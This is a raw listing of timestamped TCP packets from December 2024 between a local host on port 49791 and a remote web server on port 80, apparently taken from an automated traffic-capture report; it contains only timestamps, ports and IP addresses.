                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.067183018 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.067234993 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.068131924 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.068176031 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.068231106 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.068275928 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.069155931 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.069200039 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.069267988 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.069312096 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.070157051 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.070202112 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.070261955 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.070305109 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.071574926 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.071619987 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.071691990 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.071732998 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.072213888 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.072256088 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.072274923 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.072314024 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.073244095 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.073286057 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.073352098 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.073561907 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.074253082 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.074315071 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.074350119 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.074393034 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.075306892 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.075352907 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.075414896 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.075458050 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.076273918 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.076311111 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.214658976 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.214714050 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.214917898 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.214970112 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.215059042 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.215114117 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.215348959 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.215435028 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.215481043 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.216360092 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.216404915 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.216447115 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.216489077 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.217334986 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.217375040 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.217432976 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.217477083 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.218435049 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.218483925 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.218511105 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.218573093 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.219433069 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.219477892 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.219510078 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.219615936 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.220505953 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.220546961 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.220593929 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.220643044 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.221468925 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.221515894 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.221623898 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.221667051 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.222435951 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.222482920 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.222543001 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.222594023 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.223512888 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.223556995 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.223635912 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.223681927 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.224509954 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.224558115 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.224586964 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.224634886 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.225550890 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.225605965 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.225699902 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.226551056 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.226592064 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.226684093 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.226727009 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.227559090 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.227603912 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.227675915 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.227724075 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.228641033 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.228683949 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.228714943 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.228792906 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.229619026 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.229723930 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.229737997 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.229768991 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.230634928 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.230685949 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.230760098 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.230868101 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.231668949 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.231722116 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.231753111 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.231796026 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.232845068 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.232891083 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.232938051 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.232981920 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.233699083 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.233747005 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.233772039 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.233815908 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.234744072 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.234786987 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.234852076 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.234894991 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.235758066 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.235801935 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.235831976 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.236000061 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.236771107 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.236888885 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.236911058 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.236953974 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.237808943 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.237926006 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.237943888 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.237966061 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.238837957 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.238883972 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.238954067 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.238995075 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.239917040 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.239964962 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.240026951 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.240068913 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.240900040 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.240941048 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.241017103 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.241060972 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.241923094 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.241969109 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.242019892 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.242100000 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.242921114 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.243010044 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.243026018 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.243041039 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.243978977 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.244021893 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.244087934 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.244142056 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.244975090 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.245028019 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.245078087 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.245122910 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.246030092 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.246076107 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.246145964 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.246201038 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.247067928 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.247113943 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.247186899 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.247237921 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.248054981 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.248120070 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.248131990 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.248172998 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.249125004 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.249172926 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.249289036 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.249341965 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.250112057 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.250157118 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.250217915 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.250546932 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.251133919 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.251204014 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.251256943 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.251300097 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.252154112 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.252197981 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.252265930 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.252413034 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.253191948 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.253252983 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.253346920 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.254194975 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.254251957 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.254281998 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.254323959 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.255280018 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.255330086 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.255573988 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.255644083 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.256266117 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.256309986 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.256417036 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.256457090 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.257272005 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.257313967 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.257472992 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.257513046 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.258302927 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.258378983 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.258385897 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.258446932 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.259326935 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.259373903 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.259430885 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.259464979 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.260370016 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.260411978 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.260473967 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.260514975 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.261411905 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.261456013 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.261456966 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.261512041 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.262892962 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.263047934 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.263081074 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.263101101 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.263468027 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.263521910 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.263575077 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.263626099 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.264517069 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.264561892 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.264610052 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.264681101 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.265527010 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.265574932 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.265660048 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.265698910 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.266500950 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.266544104 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.266602039 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.266644955 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.267566919 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.267611027 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.267642975 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.267811060 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.406707048 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.406810045 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.406889915 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.407211065 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.407262087 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.407294035 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.407334089 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.408209085 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.408291101 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.408315897 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.408409119 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.409228086 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.409312963 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.409327030 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.409359932 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.410269976 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.410379887 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.410392046 CET8049791185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.410440922 CET4979180192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:20.411293030 CET8049791185.215.113.16192.168.2.4
